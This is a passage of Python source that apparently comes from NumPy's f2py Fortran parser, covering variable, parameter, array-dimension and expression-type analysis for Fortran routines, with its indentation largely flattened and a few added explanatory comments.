commonvars.append(n)
else:
n = e
errmess(
'analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n' % (e, k))
comvars.append(n)
block['common'][k] = comvars
if 'commonvars' not in block:
block['commonvars'] = commonvars
else:
block['commonvars'] = block['commonvars'] + commonvars
return block
def analyzebody(block, args, tab=''):
global usermodules, skipfuncs, onlyfuncs, f90modulevars
setmesstext(block)
body = []
for b in block['body']:
b['parent_block'] = block
if b['block'] in ['function', 'subroutine']:
if args is not None and b['name'] not in args:
continue
else:
as_ = b['args']
if b['name'] in skipfuncs:
continue
if onlyfuncs and b['name'] not in onlyfuncs:
continue
b['saved_interface'] = crack2fortrangen(
b, '\n' + ' ' * 6, as_interface=True)
else:
as_ = args
b = postcrack(b, as_, tab=tab + '\t')
if b['block'] == 'interface' and not b['body']:
if 'f2pyenhancements' not in b:
continue
if b['block'].replace(' ', '') == 'pythonmodule':
usermodules.append(b)
else:
if b['block'] == 'module':
f90modulevars[b['name']] = b['vars']
body.append(b)
return body
def buildimplicitrules(block):
setmesstext(block)
    # Work on a copy so that per-routine implicit statements cannot mutate
    # the shared module-level default rules.
    implicitrules = copy.deepcopy(defaultimplicitrules)
attrrules = {}
if 'implicit' in block:
if block['implicit'] is None:
implicitrules = None
if verbose > 1:
outmess(
'buildimplicitrules: no implicit rules for routine %s.\n' % repr(block['name']))
else:
for k in list(block['implicit'].keys()):
if block['implicit'][k].get('typespec') not in ['static', 'automatic']:
implicitrules[k] = block['implicit'][k]
else:
attrrules[k] = block['implicit'][k]['typespec']
return implicitrules, attrrules
def myeval(e, g=None, l=None):
""" Like `eval` but returns only integers and floats """
r = eval(e, g, l)
if type(r) in [int, float]:
return r
raise ValueError('r=%r' % (r))
getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z', re.I)
def getlincoef(e, xset): # e = a*x+b ; x in xset
"""
Obtain ``a`` and ``b`` when ``e == "a*x+b"``, where ``x`` is a symbol in
xset.
>>> getlincoef('2*x + 1', {'x'})
(2, 1, 'x')
>>> getlincoef('3*x + x*2 + 2 + 1', {'x'})
(5, 3, 'x')
>>> getlincoef('0', {'x'})
(0, 0, None)
>>> getlincoef('0*x', {'x'})
(0, 0, 'x')
>>> getlincoef('x*x', {'x'})
(None, None, None)
This can be tricked by sufficiently complex expressions
>>> getlincoef('(x - 0.5)*(x - 1.5)*(x - 1)*x + 2*x + 3', {'x'})
(2.0, 3.0, 'x')
"""
try:
c = int(myeval(e, {}, {}))
return 0, c, None
except Exception:
pass
if getlincoef_re_1.match(e):
return 1, 0, e
len_e = len(e)
for x in xset:
if len(x) > len_e:
continue
if re.search(r'\w\s*\([^)]*\b' + x + r'\b', e):
# skip function calls having x as an argument, e.g max(1, x)
continue
re_1 = re.compile(r'(?P<before>.*?)\b' + x + r'\b(?P<after>.*)', re.I)
m = re_1.match(e)
if m:
try:
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0, m1.group('after'))
m1 = re_1.match(ee)
b = myeval(ee, {}, {})
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1, m1.group('after'))
m1 = re_1.match(ee)
a = myeval(ee, {}, {}) - b
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0.5, m1.group('after'))
m1 = re_1.match(ee)
c = myeval(ee, {}, {})
# computing another point to be sure that expression is linear
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1.5, m1.group('after'))
m1 = re_1.match(ee)
c2 = myeval(ee, {}, {})
if (a * 0.5 + b == c and a * 1.5 + b == c2):
# gh-8062: return integers instead of floats if possible.
try:
a = int(a)
                    except Exception:
pass
try:
b = int(b)
                    except Exception:
pass
return a, b, x
except Exception:
pass
break
return None, None, None
_varname_match = re.compile(r'\A[a-z]\w*\Z').match
def getarrlen(dl, args, star='*'):
"""
Parameters
----------
dl : sequence of two str objects
dimensions of the array
args : Iterable[str]
symbols used in the expression
star : Any
unused
Returns
-------
expr : str
Some numeric expression as a string
arg : Optional[str]
If understood, the argument from `args` present in `expr`
expr2 : Optional[str]
If understood, an expression fragment that should be used as
``"(%s%s".format(something, expr2)``.
Examples
--------
>>> getarrlen(['10*x + 20', '40*x'], {'x'})
('30 * x - 19', 'x', '+19)/(30)')
>>> getarrlen(['1', '10*x + 20'], {'x'})
('10 * x + 20', 'x', '-20)/(10)')
>>> getarrlen(['10*x + 20', '1'], {'x'})
('-10 * x - 18', 'x', '+18)/(-10)')
>>> getarrlen(['20', '1'], {'x'})
('-18', None, None)
"""
edl = []
try:
edl.append(myeval(dl[0], {}, {}))
except Exception:
edl.append(dl[0])
try:
edl.append(myeval(dl[1], {}, {}))
except Exception:
edl.append(dl[1])
if isinstance(edl[0], int):
p1 = 1 - edl[0]
if p1 == 0:
d = str(dl[1])
elif p1 < 0:
d = '%s-%s' % (dl[1], -p1)
else:
d = '%s+%s' % (dl[1], p1)
elif isinstance(edl[1], int):
p1 = 1 + edl[1]
if p1 == 0:
d = '-(%s)' % (dl[0])
else:
d = '%s-(%s)' % (p1, dl[0])
else:
d = '%s-(%s)+1' % (dl[1], dl[0])
try:
return repr(myeval(d, {}, {})), None, None
except Exception:
pass
d1, d2 = getlincoef(dl[0], args), getlincoef(dl[1], args)
if None not in [d1[0], d2[0]]:
if (d1[0], d2[0]) == (0, 0):
return repr(d2[1] - d1[1] + 1), None, None
b = d2[1] - d1[1] + 1
d1 = (d1[0], 0, d1[2])
d2 = (d2[0], b, d2[2])
if d1[0] == 0 and d2[2] in args:
if b < 0:
return '%s * %s - %s' % (d2[0], d2[2], -b), d2[2], '+%s)/(%s)' % (-b, d2[0])
elif b:
return '%s * %s + %s' % (d2[0], d2[2], b), d2[2], '-%s)/(%s)' % (b, d2[0])
else:
return '%s * %s' % (d2[0], d2[2]), d2[2], ')/(%s)' % (d2[0])
if d2[0] == 0 and d1[2] in args:
if b < 0:
return '%s * %s - %s' % (-d1[0], d1[2], -b), d1[2], '+%s)/(%s)' % (-b, -d1[0])
elif b:
return '%s * %s + %s' % (-d1[0], d1[2], b), d1[2], '-%s)/(%s)' % (b, -d1[0])
else:
return '%s * %s' % (-d1[0], d1[2]), d1[2], ')/(%s)' % (-d1[0])
if d1[2] == d2[2] and d1[2] in args:
a = d2[0] - d1[0]
if not a:
return repr(b), None, None
if b < 0:
return '%s * %s - %s' % (a, d1[2], -b), d2[2], '+%s)/(%s)' % (-b, a)
elif b:
return '%s * %s + %s' % (a, d1[2], b), d2[2], '-%s)/(%s)' % (b, a)
else:
return '%s * %s' % (a, d1[2]), d2[2], ')/(%s)' % (a)
if d1[0] == d2[0] == 1:
c = str(d1[2])
if c not in args:
if _varname_match(c):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c))
c = '(%s)' % c
if b == 0:
d = '%s-%s' % (d2[2], c)
elif b < 0:
d = '%s-%s-%s' % (d2[2], c, -b)
else:
d = '%s-%s+%s' % (d2[2], c, b)
elif d1[0] == 0:
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = c2
elif b < 0:
d = '%s-%s' % (c2, -b)
else:
d = '%s+%s' % (c2, b)
elif d2[0] == 0:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
if b == 0:
d = c1
elif b < 0:
d = '%s-%s' % (c1, -b)
else:
d = '%s+%s' % (c1, b)
else:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = '%s%s' % (c2, c1)
elif b < 0:
d = '%s%s-%s' % (c2, c1, -b)
else:
d = '%s%s+%s' % (c2, c1, b)
return d, None, None
word_pattern = re.compile(r'\b[a-z][\w$]*\b', re.I)
def _get_depend_dict(name, vars, deps):
if name in vars:
words = vars[name].get('depend', [])
if '=' in vars[name] and not isstring(vars[name]):
for word in word_pattern.findall(vars[name]['=']):
if word not in words and word in vars:
words.append(word)
for word in words[:]:
for w in deps.get(word, []) \
or _get_depend_dict(word, vars, deps):
if w not in words:
words.append(w)
else:
outmess('_get_depend_dict: no dependence info for %s\n' % (repr(name)))
words = []
deps[name] = words
return words
def _calc_depend_dict(vars):
names = list(vars.keys())
depend_dict = {}
for n in names:
_get_depend_dict(n, vars, depend_dict)
return depend_dict
def get_sorted_names(vars):
    """
    Sort the names in `vars` so that every name appears only after the
    names it depends on (a topological ordering of the dependency graph
    built by _calc_depend_dict).
    """
depend_dict = _calc_depend_dict(vars)
names = []
for name in list(depend_dict.keys()):
if not depend_dict[name]:
names.append(name)
del depend_dict[name]
while depend_dict:
for name, lst in list(depend_dict.items()):
new_lst = [n for n in lst if n in depend_dict]
if not new_lst:
names.append(name)
del depend_dict[name]
else:
depend_dict[name] = new_lst
return [name for name in names if name in vars]
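# Example (added for clarity; not in the original source): with, roughly,
#   vars = {'n': {}, 'a': {'depend': ['n']}, 'b': {'=': 'a + 1'}}
# _calc_depend_dict(vars) gives {'n': [], 'a': ['n'], 'b': ['a', 'n']}, so
# get_sorted_names(vars) returns ['n', 'a', 'b']: each name is emitted only
# after everything it depends on.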
def _kind_func(string):
# XXX: return something sensible.
if string[0] in "'\"":
string = string[1:-1]
if real16pattern.match(string):
return 8
elif real8pattern.match(string):
return 4
return 'kind(' + string + ')'
def _selected_int_kind_func(r):
# XXX: This should be processor dependent
m = 10 ** r
if m <= 2 ** 8:
return 1
if m <= 2 ** 16:
return 2
if m <= 2 ** 32:
return 4
if m <= 2 ** 63:
return 8
if m <= 2 ** 128:
return 16
return -1
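# Worked examples (added): selected_int_kind(r) must represent 10**r.
#   r = 2  -> 100    <= 2**8   -> kind 1
#   r = 4  -> 10**4  <= 2**16  -> kind 2
#   r = 9  -> 10**9  <= 2**32  -> kind 4
#   r = 18 -> 10**18 <= 2**63  -> kind 8
#   r = 39 -> 10**39 >  2**128 -> -1 (no kind is wide enough)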
def _selected_real_kind_func(p, r=0, radix=0):
# XXX: This should be processor dependent
# This is only good for 0 <= p <= 20
if p < 7:
return 4
if p < 16:
return 8
machine = platform.machine().lower()
if machine.startswith(('aarch64', 'power', 'ppc', 'riscv', 's390x', 'sparc')):
if p <= 20:
return 16
else:
if p < 19:
return 10
elif p <= 20:
return 16
return -1
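# Worked examples (added): the requested decimal precision p picks the kind.
#   p = 6 -> 4 (single); p = 15 -> 8 (double).
# For p in 16..20 the answer is platform dependent: x86-style machines give
# 10 (80-bit extended) for p < 19 and 16 (quad) for 19..20, while
# aarch64/power/riscv/s390x/sparc give 16 throughout; p > 20 yields -1.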
def get_parameters(vars, global_params={}):
params = copy.copy(global_params)
g_params = copy.copy(global_params)
for name, func in [('kind', _kind_func),
('selected_int_kind', _selected_int_kind_func),
('selected_real_kind', _selected_real_kind_func), ]:
if name not in g_params:
g_params[name] = func
param_names = []
for n in get_sorted_names(vars):
if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']:
param_names.append(n)
kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_int_kind_re = re.compile(
r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_kind_re = re.compile(
r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
for n in param_names:
if '=' in vars[n]:
v = vars[n]['=']
if islogical(vars[n]):
v = v.lower()
for repl in [
('.false.', 'False'),
('.true.', 'True'),
# TODO: test .eq., .neq., etc replacements.
]:
v = v.replace(*repl)
v = kind_re.sub(r'kind("\1")', v)
v = selected_int_kind_re.sub(r'selected_int_kind(\1)', v)
# We need to act according to the data.
# The easy case is if the data has a kind-specifier,
# then we may easily remove those specifiers.
# However, it may be that the user uses other specifiers...(!)
is_replaced = False
if 'kindselector' in vars[n]:
if 'kind' in vars[n]['kindselector']:
orig_v_len = len(v)
v = v.replace('_' + vars[n]['kindselector']['kind'], '')
# Again, this will be true if even a single specifier
# has been replaced, see comment above.
is_replaced = len(v) < orig_v_len
if not is_replaced:
if not selected_kind_re.match(v):
v_ = v.split('_')
# In case there are additive parameters
if len(v_) > 1:
v = ''.join(v_[:-1]).lower().replace(v_[-1].lower(), '')
# Currently this will not work for complex numbers.
# There is missing code for extracting a complex number,
# which may be defined in either of these:
# a) (Re, Im)
# b) cmplx(Re, Im)
# c) dcmplx(Re, Im)
# d) cmplx(Re, Im, <prec>)
if isdouble(vars[n]):
tt = list(v)
for m in real16pattern.finditer(v):
tt[m.start():m.end()] = list(
v[m.start():m.end()].lower().replace('d', 'e'))
v = ''.join(tt)
elif iscomplex(vars[n]):
# FIXME complex numbers may also have exponents
if v[0] == '(' and v[-1] == ')':
# FIXME, unused l looks like potential bug
l = markoutercomma(v[1:-1]).split('@,@')
try:
params[n] = eval(v, g_params, params)
except Exception as msg:
params[n] = v
outmess('get_parameters: got "%s" on %s\n' % (msg, repr(v)))
if isstring(vars[n]) and isinstance(params[n], int):
params[n] = chr(params[n])
nl = n.lower()
if nl != n:
params[nl] = params[n]
else:
print(vars[n])
outmess(
'get_parameters:parameter %s does not have value?!\n' % (repr(n)))
return params
def _eval_length(length, params):
if length in ['(:)', '(*)', '*']:
return '(*)'
return _eval_scalar(length, params)
_is_kind_number = re.compile(r'\d+_').match
def _eval_scalar(value, params):
if _is_kind_number(value):
value = value.split('_')[0]
try:
value = str(eval(value, {}, params))
except (NameError, SyntaxError, TypeError):
return value
except Exception as msg:
errmess('"%s" in evaluating %r '
'(available names: %s)\n'
% (msg, value, list(params.keys())))
return value
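# Example (added): '3_8' is a kind-suffixed Fortran literal, so
# _eval_scalar('3_8', {}) strips the '_8' and evaluates '3' -> '3', while an
# unresolvable expression such as 'n + 1' (with 'n' not in params) is
# returned unchanged.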
def analyzevars(block):
global f90modulevars
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
vars = copy.copy(block['vars'])
if block['block'] == 'function' and block['name'] not in vars:
vars[block['name']] = {}
if '' in block['vars']:
del vars['']
if 'attrspec' in block['vars']['']:
gen = block['vars']['']['attrspec']
for n in list(vars.keys()):
for k in ['public', 'private']:
if k in gen:
vars[n] = setattrspec(vars[n], k)
svars = []
args = block['args']
for a in args:
try:
vars[a]
svars.append(a)
except KeyError:
pass
for n in list(vars.keys()):
if n not in args:
svars.append(n)
params = get_parameters(vars, get_useparameters(block))
dep_matches = {}
name_match = re.compile(r'\w[\w\d_$]*').match
for v in list(vars.keys()):
m = name_match(v)
if m:
n = v[m.start():m.end()]
try:
dep_matches[n]
except KeyError:
dep_matches[n] = re.compile(r'.*\b%s\b' % (v), re.I).match
for n in svars:
if n[0] in list(attrrules.keys()):
vars[n] = setattrspec(vars[n], attrrules[n[0]])
if 'typespec' not in vars[n]:
if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']):
if implicitrules:
ln0 = n[0].lower()
for k in list(implicitrules[ln0].keys()):
if k == 'typespec' and implicitrules[ln0][k] == 'undefined':
continue
if k not in vars[n]:
vars[n][k] = implicitrules[ln0][k]
elif k == 'attrspec':
for l in implicitrules[ln0][k]:
vars[n] = setattrspec(vars[n], l)
elif n in block['args']:
outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n' % (
repr(n), block['name']))
if 'charselector' in vars[n]:
if 'len' in vars[n]['charselector']:
l = vars[n]['charselector']['len']
try:
l = str(eval(l, {}, params))
except Exception:
pass
vars[n]['charselector']['len'] = l
if 'kindselector' in vars[n]:
if 'kind' in vars[n]['kindselector']:
l = vars[n]['kindselector']['kind']
try:
l = str(eval(l, {}, params))
except Exception:
pass
vars[n]['kindselector']['kind'] = l
savelindims = {}
if 'attrspec' in vars[n]:
attr = vars[n]['attrspec']
attr.reverse()
vars[n]['attrspec'] = []
dim, intent, depend, check, note = None, None, None, None, None
for a in attr:
if a[:9] == 'dimension':
dim = (a[9:].strip())[1:-1]
elif a[:6] == 'intent':
intent = (a[6:].strip())[1:-1]
elif a[:6] == 'depend':
depend = (a[6:].strip())[1:-1]
elif a[:5] == 'check':
check = (a[5:].strip())[1:-1]
elif a[:4] == 'note':
note = (a[4:].strip())[1:-1]
else:
vars[n] = setattrspec(vars[n], a)
if intent:
if 'intent' not in vars[n]:
vars[n]['intent'] = []
for c in [x.strip() for x in markoutercomma(intent).split('@,@')]:
# Remove spaces so that 'in out' becomes 'inout'
tmp = c.replace(' ', '')
if tmp not in vars[n]['intent']:
vars[n]['intent'].append(tmp)
intent = None
if note:
note = note.replace('\\n\\n', '\n\n')
note = note.replace('\\n ', '\n')
if 'note' not in vars[n]:
vars[n]['note'] = [note]
else:
vars[n]['note'].append(note)
note = None
if depend is not None:
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]):
if c not in vars[n]['depend']:
vars[n]['depend'].append(c)
depend = None
if check is not None:
if 'check' not in vars[n]:
vars[n]['check'] = []
for c in [x.strip() for x in markoutercomma(check).split('@,@')]:
if c not in vars[n]['check']:
vars[n]['check'].append(c)
check = None
if dim and 'dimension' not in vars[n]:
vars[n]['dimension'] = []
for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]):
star = '*'
if d == ':':
star = ':'
if d in params:
d = str(params[d])
for p in list(params.keys()):
re_1 = re.compile(r'(?P<before>.*?)\b' + p + r'\b(?P<after>.*)', re.I)
m = re_1.match(d)
while m:
d = m.group('before') + \
str(params[p]) + m.group('after')
m = re_1.match(d)
if d == star:
dl = [star]
else:
dl = markoutercomma(d, ':').split('@:@')
if len(dl) == 2 and '*' in dl: # e.g. dimension(5:*)
dl = ['*']
d = '*'
if len(dl) == 1 and not dl[0] == star:
dl = ['1', dl[0]]
if len(dl) == 2:
d, v, di = getarrlen(dl, list(block['vars'].keys()))
if d[:4] == '1 * ':
d = d[4:]
if di and di[-4:] == '/(1)':
di = di[:-4]
if v:
savelindims[d] = v, di
vars[n]['dimension'].append(d)
if 'dimension' in vars[n]:
if isintent_c(vars[n]):
shape_macro = 'shape'
else:
shape_macro = 'shape' # 'fshape'
if isstringarray(vars[n]):
if 'charselector' in vars[n]:
d = vars[n]['charselector']
if '*' in d:
d = d['*']
errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n'
% (d, n,
','.join(vars[n]['dimension']),
n, ','.join(vars[n]['dimension'] + [d])))
vars[n]['dimension'].append(d)
del vars[n]['charselector']
if 'intent' not in vars[n]:
vars[n]['intent'] = []
if 'c' not in vars[n]['intent']:
vars[n]['intent'].append('c')
else:
errmess(
"analyzevars: charselector=%r unhandled." % (d))
if 'check' not in vars[n] and 'args' in block and n in block['args']:
flag = 'depend' not in vars[n]
if flag:
vars[n]['depend'] = []
vars[n]['check'] = []
if 'dimension' in vars[n]:
#/----< no check
i = -1
ni = len(vars[n]['dimension'])
for d in vars[n]['dimension']:
ddeps = [] # dependencies of 'd'
ad = ''
pd = ''
if d not in vars:
if d in savelindims:
pd, ad = '(', savelindims[d][1]
d = savelindims[d][0]
else:
for r in block['args']:
if r not in vars:
continue
if re.match(r'.*?\b' + r + r'\b', d, re.I):
ddeps.append(r)
if d in vars:
if 'attrspec' in vars[d]:
for aa in vars[d]['attrspec']:
if aa[:6] == 'depend':
ddeps += aa[6:].strip()[1:-1].split(',')
if 'depend' in vars[d]:
ddeps = ddeps + vars[d]['depend']
i = i + 1
if d in vars and ('depend' not in vars[d]) \
and ('=' not in vars[d]) and (d not in vars[n]['depend']) \
and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]):
vars[d]['depend'] = [n]
if ni > 1:
vars[d]['='] = '%s%s(%s,%s)%s' % (
pd, shape_macro, n, i, ad)
else:
vars[d]['='] = '%slen(%s)%s' % (pd, n, ad)
# /---< no check
                        if 'check' not in vars[d]:
if ni > 1:
vars[d]['check'] = ['%s%s(%s,%i)%s==%s'
% (pd, shape_macro, n, i, ad, d)]
else:
vars[d]['check'] = [
'%slen(%s)%s>=%s' % (pd, n, ad, d)]
if 'attrspec' not in vars[d]:
vars[d]['attrspec'] = ['optional']
if ('optional' not in vars[d]['attrspec']) and\
('required' not in vars[d]['attrspec']):
vars[d]['attrspec'].append('optional')
elif d not in ['*', ':']:
#/----< no check
if flag:
if d in vars:
if n not in ddeps:
vars[n]['depend'].append(d)
else:
vars[n]['depend'] = vars[n]['depend'] + ddeps
elif isstring(vars[n]):
length = '1'
if 'charselector' in vars[n]:
if '*' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['*'],
params)
vars[n]['charselector']['*'] = length
elif 'len' in vars[n]['charselector']:
length = _eval_length(vars[n]['charselector']['len'],
params)
del vars[n]['charselector']['len']
vars[n]['charselector']['*'] = length
if not vars[n]['check']:
del vars[n]['check']
if flag and not vars[n]['depend']:
del vars[n]['depend']
if '=' in vars[n]:
if 'attrspec' not in vars[n]:
vars[n]['attrspec'] = []
if ('optional' not in vars[n]['attrspec']) and \
('required' not in vars[n]['attrspec']):
vars[n]['attrspec'].append('optional')
if 'depend' not in vars[n]:
vars[n]['depend'] = []
for v, m in list(dep_matches.items()):
if m(vars[n]['=']):
vars[n]['depend'].append(v)
if not vars[n]['depend']:
del vars[n]['depend']
if isscalar(vars[n]):
vars[n]['='] = _eval_scalar(vars[n]['='], params)
for n in list(vars.keys()):
if n == block['name']: # n is block name
if 'note' in vars[n]:
block['note'] = vars[n]['note']
if block['block'] == 'function':
if 'result' in block and block['result'] in vars:
vars[n] = appenddecl(vars[n], vars[block['result']])
if 'prefix' in block:
pr = block['prefix']
ispure = 0
isrec = 1
pr1 = pr.replace('pure', '')
ispure = (not pr == pr1)
pr = pr1.replace('recursive', '')
isrec = (not pr == pr1)
m = typespattern[0].match(pr)
if m:
typespec, selector, attr, edecl = cracktypespec0(
m.group('this'), m.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
vars[n]['typespec'] = typespec
if kindselect:
if 'kind' in kindselect:
try:
kindselect['kind'] = eval(
kindselect['kind'], {}, params)
except Exception:
pass
vars[n]['kindselector'] = kindselect
if charselect:
vars[n]['charselector'] = charselect
if typename:
vars[n]['typename'] = typename
if ispure:
vars[n] = setattrspec(vars[n], 'pure')
if isrec:
vars[n] = setattrspec(vars[n], 'recursive')
else:
outmess(
                    'analyzevars: prefix (%s) was not used\n' % repr(block['prefix']))
if not block['block'] in ['module', 'pythonmodule', 'python module', 'block data']:
if 'commonvars' in block:
neededvars = copy.copy(block['args'] + block['commonvars'])
else:
neededvars = copy.copy(block['args'])
for n in list(vars.keys()):
if l_or(isintent_callback, isintent_aux)(vars[n]):
neededvars.append(n)
if 'entry' in block:
neededvars.extend(list(block['entry'].keys()))
for k in list(block['entry'].keys()):
for n in block['entry'][k]:
if n not in neededvars:
neededvars.append(n)
if block['block'] == 'function':
if 'result' in block:
neededvars.append(block['result'])
else:
neededvars.append(block['name'])
if block['block'] in ['subroutine', 'function']:
name = block['name']
if name in vars and 'intent' in vars[name]:
block['intent'] = vars[name]['intent']
if block['block'] == 'type':
neededvars.extend(list(vars.keys()))
for n in list(vars.keys()):
if n not in neededvars:
del vars[n]
return vars
analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z', re.I)
def expr2name(a, block, args=[]):
orig_a = a
a_is_expr = not analyzeargs_re_1.match(a)
if a_is_expr: # `a` is an expression
implicitrules, attrrules = buildimplicitrules(block)
at = determineexprtype(a, block['vars'], implicitrules)
na = 'e_'
for c in a:
c = c.lower()
if c not in string.ascii_lowercase + string.digits:
c = '_'
na = na + c
if na[-1] == '_':
na = na + 'e'
else:
na = na + '_e'
a = na
while a in block['vars'] or a in block['args']:
a = a + 'r'
if a in args:
k = 1
while a + str(k) in args:
k = k + 1
a = a + str(k)
if a_is_expr:
block['vars'][a] = at
else:
if a not in block['vars']:
if orig_a in block['vars']:
block['vars'][a] = block['vars'][orig_a]
else:
block['vars'][a] = {}
if 'externals' in block and orig_a in block['externals'] + block['interfaced']:
block['vars'][a] = setattrspec(block['vars'][a], 'external')
return a
def analyzeargs(block):
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
if 'args' not in block:
block['args'] = []
args = []
for a in block['args']:
a = expr2name(a, block, args)
args.append(a)
block['args'] = args
if 'entry' in block:
for k, args1 in list(block['entry'].items()):
for a in args1:
if a not in block['vars']:
block['vars'][a] = {}
for b in block['body']:
if b['name'] in args:
if 'externals' not in block:
block['externals'] = []
if b['name'] not in block['externals']:
block['externals'].append(b['name'])
if 'result' in block and block['result'] not in block['vars']:
block['vars'][block['result']] = {}
return block
determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z', re.I)
determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(?P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_3 = re.compile(
r'\A[+-]?[\d.]+[\d+\-de.]*(_(?P<name>[\w]+)|)\Z', re.I)
determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z', re.I)
determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z', re.I)
def _ensure_exprdict(r):
if isinstance(r, int):
return {'typespec': 'integer'}
if isinstance(r, float):
return {'typespec': 'real'}
if isinstance(r, complex):
return {'typespec': 'complex'}
if isinstance(r, dict):
return r
raise AssertionError(repr(r))
def determineexprtype(expr, vars, rules={}):
if expr in vars:
return _ensure_exprdict(vars[expr])
expr = expr.strip()
if determineexprtype_re_1.match(expr):
return {'typespec': 'complex'}
m = determineexprtype_re_2.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'integer'}
m = determineexprtype_re_3.match(expr)
if m:
if 'name' in m.groupdict() and m.group('name'):
outmess(
'determineexprtype: selected kind types not supported (%s)\n' % repr(expr))
return {'typespec': 'real'}
for op in ['+', '-', '*', '/']:
for e in [x.strip() for x in markoutercomma(expr, comma=op).split('@' + op + '@')]:
if e in vars:
return _ensure_exprdict(vars[e])
t = {}
if determineexprtype_re_4.match(expr): # in parenthesis
t = determineexprtype(expr[1:-1], vars, rules)
else:
m = determineexprtype_re_5.match(expr)
if m:
rn = m.group('name')
t = determineexprtype(m.group('name'), vars, rules)
if t and 'attrspec' in t:
del t['attrspec']
if not t:
if rn[0] in rules:
return _ensure_exprdict(rules[rn[0]])
if expr[0] in '\'"':
return {'typespec': 'character', 'charselector': {'*': '*'}}
if not t:
outmess(
'determineexprtype: could not determine expressions (%s) type.\n' % (repr(expr)))
return t
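# Examples (added for clarity) of determineexprtype() classifications:
#   '(1.0, 2.0)' -> {'typespec': 'complex'}    (parenthesised pair)
#   '-42'        -> {'typespec': 'integer'}
#   '1.5e-3'     -> {'typespec': 'real'}
#   "'hello'"    -> {'typespec': 'character', 'charselector': {'*': '*'}}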
######
def crack2fortrangen(block, tab='\n', as_interface=False):
global skipfuncs, onlyfuncs
setmesstext(block)
ret = ''
if isinstance(block, list):
for g in block:
if g and g['block'] in ['function', 'subroutine']:
if g['name'] in skipfuncs:
continue
if onlyfuncs and g['name'] not in onlyfuncs:
continue
ret = ret + crack2fortrangen(g, tab, as_interface=as_interface)
return ret
prefix = ''
name = ''
args = ''
blocktype = block['block']
if blocktype == 'program':
return ''
argsl = []
if 'name' in block:
name = block['name']
if 'args' in block:
vars = block['vars']
for a in block['args']:
a = expr2name(a, block, argsl)
if not isintent_callback(vars[a]):
argsl.append(a)
if block['block'] == 'function' or argsl:
args = '(%s)' % ','.join(argsl)
f2pyenhancements = ''
if 'f2pyenhancements' in block:
for k in list(block['f2pyenhancements'].keys()):
f2pyenhancements = '%s%s%s %s' % (
f2pyenhancements, tab + tabchar, k, block['f2pyenhancements'][k])
intent_lst = block.get('intent', [])[:]
if blocktype == 'function' and 'callback' in intent_lst:
intent_lst.remove('callback')
if intent_lst:
f2pyenhancements = '%s%sintent(%s) %s' %\
(f2pyenhancements, tab + tabchar,
','.join(intent_lst), name)
use = ''
if 'use' in block:
use = use2fortran(block['use'], tab + tabchar)
common = ''
if 'common' in block:
common = common2fortran(block['common'], tab + tabchar)
if name == 'unknown_interface':
name = ''
result = ''
if 'result' in block:
result = ' result (%s)' % block['result']
if block['result'] not in argsl:
argsl.append(block['result'])
body = crack2fortrangen(block['body'], tab + tabchar)
vars = vars2fortran(
block, block['vars'], argsl, tab + tabchar, as_interface=as_interface)
mess = ''
if 'from' in block and not as_interface:
mess = '! in %s' % block['from']
if 'entry' in block:
entry_stmts = ''
for k, i in list(block['entry'].items()):
entry_stmts = '%s%sentry %s(%s)' \
% (entry_stmts, tab + tabchar, k, ','.join(i))
body = body + entry_stmts
if blocktype == 'block data' and name == '_BLOCK_DATA_':
name = ''
